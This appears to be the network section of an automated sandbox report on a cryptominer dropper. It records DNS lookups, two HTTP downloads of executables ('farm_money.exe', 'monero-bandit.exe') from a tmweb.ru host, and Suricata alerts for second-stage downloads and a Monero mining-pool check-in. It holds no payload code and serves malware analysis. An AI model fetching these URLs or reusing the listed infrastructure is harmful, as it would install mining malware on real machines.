Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
cx55566.tmweb.ru | 92.53.96.4 | |
pool.supportxmr.com | CNAME pool-fr.supportxmr.com; 37.187.95.110 | |
UDP Requests (source -> destination)

- 192.168.56.101:59369 -> 164.124.101.2:53
- 192.168.56.101:61479 -> 164.124.101.2:53
- 192.168.56.101:62324 -> 164.124.101.2:53
- 192.168.56.101:137 -> 192.168.56.255:137
- 192.168.56.101:138 -> 192.168.56.255:138
- 192.168.56.101:49152 -> 239.255.255.250:3702
- 192.168.56.101:61480 -> 239.255.255.250:3702
- 192.168.56.101:62327 -> 239.255.255.250:1900
- 192.168.56.101:62329 -> 239.255.255.250:3702
- 52.231.114.183:123 -> 192.168.56.101:123
-
GET 200 http://cx55566.tmweb.ru/farm_money.exe

REQUEST

```http
GET /farm_money.exe HTTP/1.1
Host: cx55566.tmweb.ru
Connection: Keep-Alive
```

RESPONSE

```http
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 14 Oct 2021 08:22:12 GMT
Content-Type: application/octet-stream
Content-Length: 2038272
Last-Modified: Mon, 11 Oct 2021 22:43:11 GMT
Connection: keep-alive
ETag: "6164bdff-1f1a00"
Expires: Sun, 14 Nov 2021 08:22:12 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes
```

BODY: (not captured in the report)
GET 200 http://cx55566.tmweb.ru/monero-bandit.exe

REQUEST

```http
GET /monero-bandit.exe HTTP/1.1
Host: cx55566.tmweb.ru
Connection: Keep-Alive
```

RESPONSE

```http
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 14 Oct 2021 08:22:15 GMT
Content-Type: application/octet-stream
Content-Length: 2149888
Last-Modified: Mon, 11 Oct 2021 22:34:23 GMT
Connection: keep-alive
ETag: "6164bbef-20ce00"
Expires: Sun, 14 Nov 2021 08:22:15 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes
```

BODY: (not captured in the report)
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 92.53.96.4:80 -> 192.168.56.101:49207 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 92.53.96.4:80 -> 192.168.56.101:49207 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
TCP 92.53.96.4:80 -> 192.168.56.101:49204 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 92.53.96.4:80 -> 192.168.56.101:49204 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
TCP 192.168.56.101:49212 -> 91.121.140.167:5555 | 2024792 | ET POLICY Cryptocurrency Miner Checkin | Potential Corporate Privacy Violation |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts